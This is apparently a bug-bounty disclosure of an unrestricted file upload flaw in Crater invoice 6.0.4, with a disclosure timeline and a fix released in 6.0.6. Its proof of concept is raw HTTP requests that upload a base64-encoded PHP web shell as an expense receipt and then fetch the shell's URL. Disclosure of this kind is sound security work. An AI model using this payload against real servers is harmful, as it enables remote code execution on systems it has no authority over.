Unrestricted Upload of File with Dangerous Type in crater-invoice/crater

Valid

Reported on

Feb 20th 2022

Description

In recent Crater version (bed05fc2 tag: 6.0.4) privileged user can upload PHP file as expense receipt.

Proof of Concept

POST /api/v1/expenses/59/upload/receipts HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
X-XSRF-TOKEN: eyJpdiI6IkxRVSt6bm55Y0VyTkl6UUFaaWQ5cXc9PSIsInZhbHVlIjoiSkxPZi9tZHhiakxDeEYxR1ZmS0tXYmZrZnlqcHRVWnVQRUFQbzRpT1FBUzZzSUNYaU4vK0pLbG45Uk9SdHJBajR4bTVURzBvOHBpUjF4NmRWcFc0dlo0MUdsUHllVEZWaFRWU0lLZllWbkthbHJ5dTJLNEdkNG1mejlxZU9WUEYiLCJtYWMiOiIyODQ4NmY4MGQyZTg5NjhhM2EzM2JhNjA5ZDE4M2JjYjRhNDUyYjU2ZDZiNGZhMWI2ZmIzYTI1ZDQ0YjA2OWQ0IiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------167024296112701364263127960184
Content-Length: 372
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/admin/expenses/59/edit
Cookie: XSRF-TOKEN=eyJpdiI6IkxRVSt6bm55Y0VyTkl6UUFaaWQ5cXc9PSIsInZhbHVlIjoiSkxPZi9tZHhiakxDeEYxR1ZmS0tXYmZrZnlqcHRVWnVQRUFQbzRpT1FBUzZzSUNYaU4vK0pLbG45Uk9SdHJBajR4bTVURzBvOHBpUjF4NmRWcFc0dlo0MUdsUHllVEZWaFRWU0lLZllWbkthbHJ5dTJLNEdkNG1mejlxZU9WUEYiLCJtYWMiOiIyODQ4NmY4MGQyZTg5NjhhM2EzM2JhNjA5ZDE4M2JjYjRhNDUyYjU2ZDZiNGZhMWI2ZmIzYTI1ZDQ0YjA2OWQ0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InhkelVoY3p0RmpvQlgyemF4VlA2ZGc9PSIsInZhbHVlIjoiclZlNjNDdm9wSXo5cUg2cjNYOUQ1dVIwTFdrOUNnNE8yZzVvSmI4N0NPNHUzOHVrcGZoZDh1NjB1d0hrZi9OejA1VklUL0xjVEZ0K2wxMGlMODJJR0pOMmgxTEhjd2ttcy9hemg1YVJhM0daK0djaDAzSXNmaUpWMWpOYTJXWGMiLCJtYWMiOiIxY2I0NmExN2E1MDRiMzQyM2FiZWE2M2I4NTcxNzlmM2UxZjg3M2Q5Yjg3NjJhM2I5ZmMzMzY2YzU5MmU5MzE4IiwidGFnIjoiIn0%3D; 2CFqtnwTnUo9tjJ5scD3gy0OQlXUasdaVYthIQKu=eyJpdiI6IkZRY3BodmN6ZDJhQzJ6RFhqZVg0amc9PSIsInZhbHVlIjoibjBoUGkzNEE2YVJmdGphUHYzQnFZcHNKdnBHeU9mQk1PL1kzNTNqYWpUVm05VDRlbTdGekROOGxwd2U2VDdpNEdsMGpXQ0I1ZU92bGJJMnluUEJSOWh2S3Y1QWJRTi9zQnRGN0VZTGNvK2ZnU1hWMlBBWitmM2tSa3hrbEdFRVo3dFdhZmdzaHNQZFp3TlE2dFBHSXluSkRqQzVtRUlJYWo4T2JHTEtQTkpUYkFZT1pWOEdUTm1TR0E1SXdld01XblJlTFNNKy83SWlSaHpkbUYrMGREYzVTTmsxZERlRm1IMGRWbFBJSzdUT3VqT0kxN2JwMUZnOHMwMUw1dUNDMHhPNE5Sb2tPdCt5NzVHdlArSDlnOGc4dTJ1MG9KUnZPNUdjanF5Y1ljZkJsY1F5N2h6bTlBcGRMSjZBRjZNaVduMXcwendtaXh5cVBycjJJcEhLRG1xbzM3R1cwWjRQc29Tc3g3aHBiS29iVExYTWc3bWtiR0RVbE9yZ0dlTnRub243WUxudmV3ZSswaHhINVBxdzdvWWx0SlhrMndZY1RMTWRXUWZnVEEyWnRsRWFQcVVSVEZTYzNHYXRGaGs5eFovK1ErUVdKQjIyRkY2MGZZNlI0cXhnakhTSXFUWWRrYlU5RWREYk9LMlZ1RzZpYWFCd214bW5zcFVTUVczVTFmR3p2eFQyaGpGR3hsYVNnQkdENnZRPT0iLCJtYWMiOiIyZTA2YTZjZDk3Mjg5ZWM1MjU3ODk4MzIxY2NiOWUwODRhYTAwNDllOThiMTNlOWVkZGIxZTgwYmMyOGFjZTk1IiwidGFnIjoiIn0%3D

-----------------------------167024296112701364263127960184
Content-Disposition: form-data; name="type"

edit
-----------------------------167024296112701364263127960184
Content-Disposition: form-data; name="attachment_receipt"

{"data":"PD89YCRfR0VUWzFdYD8+","type":"edit","name":"2137webshell.php"}
-----------------------------167024296112701364263127960184--

Next when get this expense through the API You will receive attachment_receipt_url param with url to the webshell file

GET /api/v1/expenses/59 HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
X-XSRF-TOKEN: eyJpdiI6IkR4UDNSU1kzai9Ya0ljSTg1cEpCWmc9PSIsInZhbHVlIjoiMVA1b241VHpQWlBQNklrT1RVM1RxcUZRSEU3MGkraHh1OTNQcnJzdWVGR25mblZRQWp6Y3hhYzJnamkyWDgzNEpING9hb3lzT1U4dWlKYlFrcm0zYWlKNWNOQlRhWHVnQnpuTm1TZVVSdHIweTNHMFJJN0F4Z3FwNlhYZEVaY1oiLCJtYWMiOiI3YTQyMDk1NGNmYTYxMGMyZWM0MzQzNDkwMWQ0NDc1NzdiNjdiNmRhNzgzNTA4ZjU5NDVhYTAyNWU1YzZiNDYzIiwidGFnIjoiIn0=
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/admin/expenses/59/edit
Cookie: ...


HTTP/1.1 200 OK
Host: 172.17.0.1:8888
Date: Sun, 20 Feb 2022 20:47:20 GMT
Connection: close
X-Powered-By: PHP/8.0.15
Cache-Control: no-cache, private
Date: Sun, 20 Feb 2022 20:47:20 GMT
Content-Type: application/json
X-RateLimit-Limit: 180
X-RateLimit-Remaining: 178
Set-Cookie: ...

{
    "data":
    {
        "id": 59,
        "expense_date": "2022-01-22T00:00:00.000000Z",
        "amount": 100,
        "notes": "assss",
        "customer_id": 2,
        "attachment_receipt_url":
        {
            "url": "http:\/\/172.17.0.1:8888\/storage\/50\/2137webshell.php",
            "type": "other"
        }
...
    }
}

Impact

This vulnerability is high and leads to code execution

We are processing your report and will contact the crater-invoice/crater team within 24 hours. a year ago
theworstcomrade submitted a
patch
a year ago
We have contacted a member of the crater-invoice/crater team and are waiting to hear back a year ago
We have sent a follow up to the crater-invoice/crater team. We will try again in 7 days. a year ago
We have sent a second follow up to the crater-invoice/crater team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the crater-invoice/crater team. This report is now considered stale. a year ago
Mohit Panjwani validated this vulnerability a year ago
theworstcomrade has been awarded the disclosure bounty
The fix bounty is now up for grabs
theworstcomrade
a year ago

Researcher

@mohitpanjwani here you have the fix https://github.com/crater-invoice/crater/pull/855

Mohit Panjwani marked this as fixed in 6.0.6 with commit 88035e a year ago
theworstcomrade has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation